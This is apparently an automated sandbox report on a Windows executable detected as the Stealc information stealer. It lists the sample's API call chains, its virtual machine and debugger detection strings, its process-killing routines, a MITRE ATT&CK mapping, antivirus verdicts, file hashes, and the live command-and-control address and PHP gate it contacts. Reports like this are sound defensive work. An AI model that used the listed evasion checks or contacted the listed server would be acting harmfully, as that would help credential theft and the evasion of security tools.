              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00443910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00443910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00441250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00441250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00441269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00441269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0044E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0044E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00444B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00444B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00444B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00444B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0044CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0044CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0043DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0043DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00442390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_00442390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0043DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0043DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004423A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_004423A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0044D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0044D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0044DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_0044DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004316A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_004316A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004316B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_004316B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00451BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,1_2_00451BF0
              Source: file.exe, file.exe, 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000002.2252021419.0000000001053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.
              Source: file.exe, 00000001.00000002.2252021419.0000000001053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000001.00000002.2252021419.0000000001024000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
              Source: file.exe, 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25793
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25948
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25940
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25813
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00434A60 VirtualProtect 00000000,00000004,00000100,?1_2_00434A60
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00456390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00456390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00456390 mov eax, dword ptr fs:[00000030h]1_2_00456390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00452A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00452A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2664, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00454610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_00454610
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004546A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_004546A0
              Source: file.exe, file.exe, 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: YProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00452D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00452B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,1_2_00452B60
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00452A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00452A40
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00452C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00452C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2210616498.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2664, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2210616498.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2664, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe51%VirustotalBrowse
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206//oY=100%Avira URL Cloudmalware
              http://185.215.113.206%0%Avira URL Cloudsafe
              http://185.215.113.206/ToN=100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206//oY=file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.215.113.206/ToN=file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/wsfile.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206%file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.215.113.206/c4becf79229cb002.phphfile.exe, 00000001.00000002.2252021419.0000000001053000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.206
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1561690
                          Start date and time:2024-11-24 05:10:11 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 8s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:2
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 18
                          • Number of non-executed functions: 125
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Excluded IPs from analysis (whitelisted): 4.245.163.56
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.206file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.43
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.43
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadeyBrowse
                          • 185.215.113.43

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946913420590235
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'827'840 bytes
                          MD5:358f03c97356f147bacbfe66db998b47
                          SHA1:86778c0cabcb58f05672a91feb182eecef95e8b8
                          SHA256:292c01862fad9dc3ab9a0348756832a5f44273ea50b23088f77fa0e5acaec7d4
                          SHA512:009fdc3b08fce89273bfcbad825512d875958c44982077f6fc2b6c5b49ea80bbae75deb01464f1917c2f470a13273f82e26826df9ef3db9c466096a1833beb21
                          SSDEEP:24576:mivxjNxlibrzROZjXt9BUmG9TVtCXLYQ5jqpcEmG3F5hiM9kfM7OKr06ppzF1VQE:hvdNxlibBkdUmGm0c81SfM7OAGj6H/
                          TLSH:098533391D4325B6CCB48B70ACDFA293BDE55E31751C861B2E2726FB8AC648578CC0D9
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0xaaa000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007FEF0C548FFAh
                          cmpps xmm3, dqword ptr [ebx], 00h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          jmp 00007FEF0C54AFF5h
                          add byte ptr [esi], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax+00000000h], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
